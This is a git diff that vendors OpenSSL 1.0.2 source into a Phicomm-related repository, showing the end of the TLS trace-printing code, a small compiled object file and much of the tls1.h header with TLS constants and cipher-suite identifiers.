+            return 0;
+        break;
+
+    case SSL3_MT_CERTIFICATE_VERIFY:
+        if (!ssl_print_signature(bio, indent + 2, ssl, &msg, &msglen))
+            return 0;
+        break;
+
+    case SSL3_MT_CERTIFICATE_REQUEST:
+        if (!ssl_print_cert_request(bio, indent + 2, ssl, msg, msglen))
+            return 0;
+        break;
+
+    case SSL3_MT_FINISHED:
+        ssl_print_hex(bio, indent + 2, "verify_data", msg, msglen);
+        break;
+
+    case SSL3_MT_SERVER_DONE:
+        if (msglen != 0)
+            ssl_print_hex(bio, indent + 2, "unexpected value", msg, msglen);
+        break;
+
+    case SSL3_MT_NEWSESSION_TICKET:
+        if (!ssl_print_ticket(bio, indent + 2, msg, msglen))
+            return 0;
+        break;
+
+    default:
+        BIO_indent(bio, indent + 2, 80);
+        BIO_puts(bio, "Unsupported, hex dump follows:\n");
+        BIO_dump_indent(bio, (char *)msg, msglen, indent + 4);
+    }
+    return 1;
+}
+
+static int ssl_print_heartbeat(BIO *bio, int indent,
+                               const unsigned char *msg, size_t msglen)
+{
+    if (msglen < 3)
+        return 0;
+    BIO_indent(bio, indent, 80);
+    BIO_printf(bio, "HeartBeatMessageType: %s\n",
+               ssl_trace_str(msg[0], ssl_hb_type_tbl));
+    msg++;
+    msglen--;
+    if (!ssl_print_hexbuf(bio, indent, "payload", 2, &msg, &msglen))
+        return 0;
+    ssl_print_hex(bio, indent, "padding", msg, msglen);
+    return 1;
+}
+
+const char *SSL_CIPHER_standard_name(const SSL_CIPHER *c)
+{
+    if (c->algorithm_ssl & SSL_SSLV2)
+        return NULL;
+    return ssl_trace_str(c->id & 0xFFFF, ssl_ciphers_tbl);
+}
+
+void SSL_trace(int write_p, int version, int content_type,
+               const void *buf, size_t msglen, SSL *ssl, void *arg)
+{
+    const unsigned char *msg = buf;
+    BIO *bio = arg;
+
+    if (write_p == 2) {
+        BIO_puts(bio, "Session ");
+        ssl_print_hex(bio, 0,
+                      ssl_trace_str(content_type, ssl_crypto_tbl),
+                      msg, msglen);
+        return;
+    }
+    switch (content_type) {
+    case SSL3_RT_HEADER:
+        {
+            int hvers = msg[1] << 8 | msg[2];
+            BIO_puts(bio, write_p ? "Sent" : "Received");
+            BIO_printf(bio, " Record\nHeader:\n  Version = %s (0x%x)\n",
+                       ssl_trace_str(hvers, ssl_version_tbl), hvers);
+            if (SSL_IS_DTLS(ssl)) {
+                BIO_printf(bio,
+                           "  epoch=%d, sequence_number=%04x%04x%04x\n",
+                           (msg[3] << 8 | msg[4]),
+                           (msg[5] << 8 | msg[6]),
+                           (msg[7] << 8 | msg[8]), (msg[9] << 8 | msg[10]));
+# if 0
+                /*
+                 * Just print handshake type so we can see what is going on
+                 * during fragmentation.
+                 */
+                BIO_printf(bio, "(%s)\n",
+                           ssl_trace_str(msg[msglen], ssl_handshake_tbl));
+# endif
+            }
+
+            BIO_printf(bio, "  Content Type = %s (%d)\n  Length = %d",
+                       ssl_trace_str(msg[0], ssl_content_tbl), msg[0],
+                       msg[msglen - 2] << 8 | msg[msglen - 1]);
+        }
+        break;
+    case SSL3_RT_HANDSHAKE:
+        if (!ssl_print_handshake(bio, ssl, msg, msglen, 4))
+            BIO_printf(bio, "Message length parse error!\n");
+        break;
+
+    case SSL3_RT_CHANGE_CIPHER_SPEC:
+        if (msglen == 1 && msg[0] == 1)
+            BIO_puts(bio, "    change_cipher_spec (1)\n");
+        else
+            ssl_print_hex(bio, 4, "unknown value", msg, msglen);
+        break;
+
+    case SSL3_RT_ALERT:
+        if (msglen != 2)
+            BIO_puts(bio, "    Illegal Alert Length\n");
+        else {
+            BIO_printf(bio, "    Level=%s(%d), description=%s(%d)\n",
+                       SSL_alert_type_string_long(msg[0] << 8),
+                       msg[0], SSL_alert_desc_string_long(msg[1]), msg[1]);
+        }
+    case TLS1_RT_HEARTBEAT:
+        ssl_print_heartbeat(bio, 4, msg, msglen);
+        break;
+
+    }
+
+    BIO_puts(bio, "\n");
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_trce.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_trce.o
new file mode 100644
index 0000000000000000000000000000000000000000..1d00a95943d99f67ce50d3a30c0a4f5249fd1ad9
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`E_eF1lmv~aqE{PwA9wbm|FCtzFf(J=rP$)@CvVr!Zf5D&Qv46>5
zpfkxXF1x9R4ou$8+xKQCoAzUHciV9sP~pH0{8fqt_|nLrrUTf74S-?4f9)QQqAC-W
zd&SSV*Yhu{y7b>qJ?@<!HFVRfi?EHkf;qe&K?h(?9K-xC==d&t|FmgX>%`O(ySD^e
za2l(pvJDJYZ4w!V6ImhrXHmonj{$f&OGOwVilV_cwGzox0DlQZ2s|oF;BlU&NrqgO
zi-hCN^hy!NV_Cmu6`vIOBq_wqI&mpt4_$Pp=9>izx@n)kR_x=GIP<#&^{)Le{Rb#n
z$6VHbf?n$BVd@dc;#enft<G0?p>eu&tQXo^`4lz4#Tush3!6xRD^UTxs~*(P^wR#P
q6wM`)PbE>ilE;6Zb$7J&AP3!&ItAwZJGf!qJ!zk$@KG5hn*Lv`DLD`T

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls1.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls1.h
new file mode 100644
index 0000000..5929607
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/tls1.h
@@ -0,0 +1,813 @@
+/* ssl/tls1.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * ECC cipher suite support in OpenSSL originally written by
+ * Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#ifndef HEADER_TLS1_H
+# define HEADER_TLS1_H
+
+# include <openssl/buffer.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# define TLS1_ALLOW_EXPERIMENTAL_CIPHERSUITES    0
+
+# define TLS1_VERSION                    0x0301
+# define TLS1_1_VERSION                  0x0302
+# define TLS1_2_VERSION                  0x0303
+# define TLS_MAX_VERSION                 TLS1_2_VERSION
+
+# define TLS1_VERSION_MAJOR              0x03
+# define TLS1_VERSION_MINOR              0x01
+
+# define TLS1_1_VERSION_MAJOR            0x03
+# define TLS1_1_VERSION_MINOR            0x02
+
+# define TLS1_2_VERSION_MAJOR            0x03
+# define TLS1_2_VERSION_MINOR            0x03
+
+# define TLS1_get_version(s) \
+                ((s->version >> 8) == TLS1_VERSION_MAJOR ? s->version : 0)
+
+# define TLS1_get_client_version(s) \
+                ((s->client_version >> 8) == TLS1_VERSION_MAJOR ? s->client_version : 0)
+
+# define TLS1_AD_DECRYPTION_FAILED       21
+# define TLS1_AD_RECORD_OVERFLOW         22
+# define TLS1_AD_UNKNOWN_CA              48/* fatal */
+# define TLS1_AD_ACCESS_DENIED           49/* fatal */
+# define TLS1_AD_DECODE_ERROR            50/* fatal */
+# define TLS1_AD_DECRYPT_ERROR           51
+# define TLS1_AD_EXPORT_RESTRICTION      60/* fatal */
+# define TLS1_AD_PROTOCOL_VERSION        70/* fatal */
+# define TLS1_AD_INSUFFICIENT_SECURITY   71/* fatal */
+# define TLS1_AD_INTERNAL_ERROR          80/* fatal */
+# define TLS1_AD_INAPPROPRIATE_FALLBACK  86/* fatal */
+# define TLS1_AD_USER_CANCELLED          90
+# define TLS1_AD_NO_RENEGOTIATION        100
+/* codes 110-114 are from RFC3546 */
+# define TLS1_AD_UNSUPPORTED_EXTENSION   110
+# define TLS1_AD_CERTIFICATE_UNOBTAINABLE 111
+# define TLS1_AD_UNRECOGNIZED_NAME       112
+# define TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE 113
+# define TLS1_AD_BAD_CERTIFICATE_HASH_VALUE 114
+# define TLS1_AD_UNKNOWN_PSK_IDENTITY    115/* fatal */
+
+/* ExtensionType values from RFC3546 / RFC4366 / RFC6066 */
+# define TLSEXT_TYPE_server_name                 0
+# define TLSEXT_TYPE_max_fragment_length         1
+# define TLSEXT_TYPE_client_certificate_url      2
+# define TLSEXT_TYPE_trusted_ca_keys             3
+# define TLSEXT_TYPE_truncated_hmac              4
+# define TLSEXT_TYPE_status_request              5
+/* ExtensionType values from RFC4681 */
+# define TLSEXT_TYPE_user_mapping                6
+/* ExtensionType values from RFC5878 */
+# define TLSEXT_TYPE_client_authz                7
+# define TLSEXT_TYPE_server_authz                8
+/* ExtensionType values from RFC6091 */
+# define TLSEXT_TYPE_cert_type           9
+
+/* ExtensionType values from RFC4492 */
+# define TLSEXT_TYPE_elliptic_curves             10
+# define TLSEXT_TYPE_ec_point_formats            11
+
+/* ExtensionType value from RFC5054 */
+# define TLSEXT_TYPE_srp                         12
+
+/* ExtensionType values from RFC5246 */
+# define TLSEXT_TYPE_signature_algorithms        13
+
+/* ExtensionType value from RFC5764 */
+# define TLSEXT_TYPE_use_srtp    14
+
+/* ExtensionType value from RFC5620 */
+# define TLSEXT_TYPE_heartbeat   15
+
+/* ExtensionType value from draft-ietf-tls-applayerprotoneg-00 */
+# define TLSEXT_TYPE_application_layer_protocol_negotiation 16
+
+/*
+ * ExtensionType value for TLS padding extension.
+ * http://www.iana.org/assignments/tls-extensiontype-values/tls-extensiontype-values.xhtml
+ * http://tools.ietf.org/html/draft-agl-tls-padding-03
+ */
+# define TLSEXT_TYPE_padding     21
+
+/* ExtensionType value from RFC4507 */
+# define TLSEXT_TYPE_session_ticket              35
+
+/* ExtensionType value from draft-rescorla-tls-opaque-prf-input-00.txt */
+# if 0
+/*
+ * will have to be provided externally for now ,
+ * i.e. build with -DTLSEXT_TYPE_opaque_prf_input=38183
+ * using whatever extension number you'd like to try
+ */
+#  define TLSEXT_TYPE_opaque_prf_input           ??
+# endif
+
+/* Temporary extension type */
+# define TLSEXT_TYPE_renegotiate                 0xff01
+
+# ifndef OPENSSL_NO_NEXTPROTONEG
+/* This is not an IANA defined extension number */
+#  define TLSEXT_TYPE_next_proto_neg              13172
+# endif
+
+/* NameType value from RFC 3546 */
+# define TLSEXT_NAMETYPE_host_name 0
+/* status request value from RFC 3546 */
+# define TLSEXT_STATUSTYPE_ocsp 1
+
+/* ECPointFormat values from draft-ietf-tls-ecc-12 */
+# define TLSEXT_ECPOINTFORMAT_first                      0
+# define TLSEXT_ECPOINTFORMAT_uncompressed               0
+# define TLSEXT_ECPOINTFORMAT_ansiX962_compressed_prime  1
+# define TLSEXT_ECPOINTFORMAT_ansiX962_compressed_char2  2
+# define TLSEXT_ECPOINTFORMAT_last                       2
+
+/* Signature and hash algorithms from RFC 5246 */
+
+# define TLSEXT_signature_anonymous                      0
+# define TLSEXT_signature_rsa                            1
+# define TLSEXT_signature_dsa                            2
+# define TLSEXT_signature_ecdsa                          3
+
+/* Total number of different signature algorithms */
+# define TLSEXT_signature_num                            4
+
+# define TLSEXT_hash_none                                0
+# define TLSEXT_hash_md5                                 1
+# define TLSEXT_hash_sha1                                2
+# define TLSEXT_hash_sha224                              3
+# define TLSEXT_hash_sha256                              4
+# define TLSEXT_hash_sha384                              5
+# define TLSEXT_hash_sha512                              6
+
+/* Total number of different digest algorithms */
+
+# define TLSEXT_hash_num                                 7
+
+/* Flag set for unrecognised algorithms */
+# define TLSEXT_nid_unknown                              0x1000000
+
+/* ECC curves */
+
+# define TLSEXT_curve_P_256                              23
+# define TLSEXT_curve_P_384                              24
+
+# ifndef OPENSSL_NO_TLSEXT
+
+#  define TLSEXT_MAXLEN_host_name 255
+
+const char *SSL_get_servername(const SSL *s, const int type);
+int SSL_get_servername_type(const SSL *s);
+/*
+ * SSL_export_keying_material exports a value derived from the master secret,
+ * as specified in RFC 5705. It writes |olen| bytes to |out| given a label and
+ * optional context. (Since a zero length context is allowed, the |use_context|
+ * flag controls whether a context is included.) It returns 1 on success and
+ * zero otherwise.
+ */
+int SSL_export_keying_material(SSL *s, unsigned char *out, size_t olen,
+                               const char *label, size_t llen,
+                               const unsigned char *p, size_t plen,
+                               int use_context);
+
+int SSL_get_sigalgs(SSL *s, int idx,
+                    int *psign, int *phash, int *psignandhash,
+                    unsigned char *rsig, unsigned char *rhash);
+
+int SSL_get_shared_sigalgs(SSL *s, int idx,
+                           int *psign, int *phash, int *psignandhash,
+                           unsigned char *rsig, unsigned char *rhash);
+
+int SSL_check_chain(SSL *s, X509 *x, EVP_PKEY *pk, STACK_OF(X509) *chain);
+
+#  define SSL_set_tlsext_host_name(s,name) \
+SSL_ctrl(s,SSL_CTRL_SET_TLSEXT_HOSTNAME,TLSEXT_NAMETYPE_host_name,(char *)name)
+
+#  define SSL_set_tlsext_debug_callback(ssl, cb) \
+SSL_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_DEBUG_CB,(void (*)(void))cb)
+
+#  define SSL_set_tlsext_debug_arg(ssl, arg) \
+SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_DEBUG_ARG,0, (void *)arg)
+
+#  define SSL_set_tlsext_status_type(ssl, type) \
+SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_TYPE,type, NULL)
+
+#  define SSL_get_tlsext_status_exts(ssl, arg) \
+SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_EXTS,0, (void *)arg)
+
+#  define SSL_set_tlsext_status_exts(ssl, arg) \
+SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_EXTS,0, (void *)arg)
+
+#  define SSL_get_tlsext_status_ids(ssl, arg) \
+SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_IDS,0, (void *)arg)
+
+#  define SSL_set_tlsext_status_ids(ssl, arg) \
+SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_IDS,0, (void *)arg)
+
+#  define SSL_get_tlsext_status_ocsp_resp(ssl, arg) \
+SSL_ctrl(ssl,SSL_CTRL_GET_TLSEXT_STATUS_REQ_OCSP_RESP,0, (void *)arg)
+
+#  define SSL_set_tlsext_status_ocsp_resp(ssl, arg, arglen) \
+SSL_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_OCSP_RESP,arglen, (void *)arg)
+
+#  define SSL_CTX_set_tlsext_servername_callback(ctx, cb) \
+SSL_CTX_callback_ctrl(ctx,SSL_CTRL_SET_TLSEXT_SERVERNAME_CB,(void (*)(void))cb)
+
+#  define SSL_TLSEXT_ERR_OK 0
+#  define SSL_TLSEXT_ERR_ALERT_WARNING 1
+#  define SSL_TLSEXT_ERR_ALERT_FATAL 2
+#  define SSL_TLSEXT_ERR_NOACK 3
+
+#  define SSL_CTX_set_tlsext_servername_arg(ctx, arg) \
+SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG,0, (void *)arg)
+
+#  define SSL_CTX_get_tlsext_ticket_keys(ctx, keys, keylen) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_GET_TLSEXT_TICKET_KEYS,(keylen),(keys))
+#  define SSL_CTX_set_tlsext_ticket_keys(ctx, keys, keylen) \
+        SSL_CTX_ctrl((ctx),SSL_CTRL_SET_TLSEXT_TICKET_KEYS,(keylen),(keys))
+
+#  define SSL_CTX_set_tlsext_status_cb(ssl, cb) \
+SSL_CTX_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB,(void (*)(void))cb)
+
+#  define SSL_CTX_set_tlsext_status_arg(ssl, arg) \
+SSL_CTX_ctrl(ssl,SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB_ARG,0, (void *)arg)
+
+#  define SSL_set_tlsext_opaque_prf_input(s, src, len) \
+SSL_ctrl(s,SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT, len, src)
+#  define SSL_CTX_set_tlsext_opaque_prf_input_callback(ctx, cb) \
+SSL_CTX_callback_ctrl(ctx,SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT_CB, (void (*)(void))cb)
+#  define SSL_CTX_set_tlsext_opaque_prf_input_callback_arg(ctx, arg) \
+SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT_CB_ARG, 0, arg)
+
+#  define SSL_CTX_set_tlsext_ticket_key_cb(ssl, cb) \
+SSL_CTX_callback_ctrl(ssl,SSL_CTRL_SET_TLSEXT_TICKET_KEY_CB,(void (*)(void))cb)
+
+#  ifndef OPENSSL_NO_HEARTBEATS
+#   define SSL_TLSEXT_HB_ENABLED                           0x01
+#   define SSL_TLSEXT_HB_DONT_SEND_REQUESTS        0x02
+#   define SSL_TLSEXT_HB_DONT_RECV_REQUESTS        0x04
+
+#   define SSL_get_tlsext_heartbeat_pending(ssl) \
+        SSL_ctrl((ssl),SSL_CTRL_GET_TLS_EXT_HEARTBEAT_PENDING,0,NULL)
+#   define SSL_set_tlsext_heartbeat_no_requests(ssl, arg) \
+        SSL_ctrl((ssl),SSL_CTRL_SET_TLS_EXT_HEARTBEAT_NO_REQUESTS,arg,NULL)
+#  endif
+# endif
+
+/* PSK ciphersuites from 4279 */
+# define TLS1_CK_PSK_WITH_RC4_128_SHA                    0x0300008A
+# define TLS1_CK_PSK_WITH_3DES_EDE_CBC_SHA               0x0300008B
+# define TLS1_CK_PSK_WITH_AES_128_CBC_SHA                0x0300008C
+# define TLS1_CK_PSK_WITH_AES_256_CBC_SHA                0x0300008D
+
+/*
+ * Additional TLS ciphersuites from expired Internet Draft
+ * draft-ietf-tls-56-bit-ciphersuites-01.txt (available if
+ * TLS1_ALLOW_EXPERIMENTAL_CIPHERSUITES is defined, see s3_lib.c).  We
+ * actually treat them like SSL 3.0 ciphers, which we probably shouldn't.
+ * Note that the first two are actually not in the IDs.
+ */
+# define TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_MD5          0x03000060/* not in
+                                                                    * ID */
+# define TLS1_CK_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5      0x03000061/* not in
+                                                                    * ID */
+# define TLS1_CK_RSA_EXPORT1024_WITH_DES_CBC_SHA         0x03000062
+# define TLS1_CK_DHE_DSS_EXPORT1024_WITH_DES_CBC_SHA     0x03000063
+# define TLS1_CK_RSA_EXPORT1024_WITH_RC4_56_SHA          0x03000064
+# define TLS1_CK_DHE_DSS_EXPORT1024_WITH_RC4_56_SHA      0x03000065
+# define TLS1_CK_DHE_DSS_WITH_RC4_128_SHA                0x03000066
+
+/* AES ciphersuites from RFC3268 */
+
+# define TLS1_CK_RSA_WITH_AES_128_SHA                    0x0300002F
+# define TLS1_CK_DH_DSS_WITH_AES_128_SHA                 0x03000030
+# define TLS1_CK_DH_RSA_WITH_AES_128_SHA                 0x03000031
+# define TLS1_CK_DHE_DSS_WITH_AES_128_SHA                0x03000032
+# define TLS1_CK_DHE_RSA_WITH_AES_128_SHA                0x03000033
+# define TLS1_CK_ADH_WITH_AES_128_SHA                    0x03000034
+
+# define TLS1_CK_RSA_WITH_AES_256_SHA                    0x03000035
+# define TLS1_CK_DH_DSS_WITH_AES_256_SHA                 0x03000036
+# define TLS1_CK_DH_RSA_WITH_AES_256_SHA                 0x03000037
+# define TLS1_CK_DHE_DSS_WITH_AES_256_SHA                0x03000038
+# define TLS1_CK_DHE_RSA_WITH_AES_256_SHA                0x03000039
+# define TLS1_CK_ADH_WITH_AES_256_SHA                    0x0300003A
+
+/* TLS v1.2 ciphersuites */
+# define TLS1_CK_RSA_WITH_NULL_SHA256                    0x0300003B
+# define TLS1_CK_RSA_WITH_AES_128_SHA256                 0x0300003C
+# define TLS1_CK_RSA_WITH_AES_256_SHA256                 0x0300003D
+# define TLS1_CK_DH_DSS_WITH_AES_128_SHA256              0x0300003E
+# define TLS1_CK_DH_RSA_WITH_AES_128_SHA256              0x0300003F
+# define TLS1_CK_DHE_DSS_WITH_AES_128_SHA256             0x03000040
+
+/* Camellia ciphersuites from RFC4132 */
+# define TLS1_CK_RSA_WITH_CAMELLIA_128_CBC_SHA           0x03000041
+# define TLS1_CK_DH_DSS_WITH_CAMELLIA_128_CBC_SHA        0x03000042
+# define TLS1_CK_DH_RSA_WITH_CAMELLIA_128_CBC_SHA        0x03000043
+# define TLS1_CK_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA       0x03000044
+# define TLS1_CK_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA       0x03000045
+# define TLS1_CK_ADH_WITH_CAMELLIA_128_CBC_SHA           0x03000046
+
+/* TLS v1.2 ciphersuites */
+# define TLS1_CK_DHE_RSA_WITH_AES_128_SHA256             0x03000067
+# define TLS1_CK_DH_DSS_WITH_AES_256_SHA256              0x03000068
+# define TLS1_CK_DH_RSA_WITH_AES_256_SHA256              0x03000069
+# define TLS1_CK_DHE_DSS_WITH_AES_256_SHA256             0x0300006A
+# define TLS1_CK_DHE_RSA_WITH_AES_256_SHA256             0x0300006B
+# define TLS1_CK_ADH_WITH_AES_128_SHA256                 0x0300006C
+# define TLS1_CK_ADH_WITH_AES_256_SHA256                 0x0300006D
+
+/* Camellia ciphersuites from RFC4132 */
+# define TLS1_CK_RSA_WITH_CAMELLIA_256_CBC_SHA           0x03000084
+# define TLS1_CK_DH_DSS_WITH_CAMELLIA_256_CBC_SHA        0x03000085
+# define TLS1_CK_DH_RSA_WITH_CAMELLIA_256_CBC_SHA        0x03000086
+# define TLS1_CK_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA       0x03000087
+# define TLS1_CK_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA       0x03000088
+# define TLS1_CK_ADH_WITH_CAMELLIA_256_CBC_SHA           0x03000089
+
+/* SEED ciphersuites from RFC4162 */
+# define TLS1_CK_RSA_WITH_SEED_SHA                       0x03000096
+# define TLS1_CK_DH_DSS_WITH_SEED_SHA                    0x03000097
+# define TLS1_CK_DH_RSA_WITH_SEED_SHA                    0x03000098
+# define TLS1_CK_DHE_DSS_WITH_SEED_SHA                   0x03000099
+# define TLS1_CK_DHE_RSA_WITH_SEED_SHA                   0x0300009A
+# define TLS1_CK_ADH_WITH_SEED_SHA                       0x0300009B
+
+/* TLS v1.2 GCM ciphersuites from RFC5288 */
+# define TLS1_CK_RSA_WITH_AES_128_GCM_SHA256             0x0300009C
+# define TLS1_CK_RSA_WITH_AES_256_GCM_SHA384             0x0300009D
+# define TLS1_CK_DHE_RSA_WITH_AES_128_GCM_SHA256         0x0300009E
+# define TLS1_CK_DHE_RSA_WITH_AES_256_GCM_SHA384         0x0300009F
+# define TLS1_CK_DH_RSA_WITH_AES_128_GCM_SHA256          0x030000A0
+# define TLS1_CK_DH_RSA_WITH_AES_256_GCM_SHA384          0x030000A1
+# define TLS1_CK_DHE_DSS_WITH_AES_128_GCM_SHA256         0x030000A2
+# define TLS1_CK_DHE_DSS_WITH_AES_256_GCM_SHA384         0x030000A3
+# define TLS1_CK_DH_DSS_WITH_AES_128_GCM_SHA256          0x030000A4
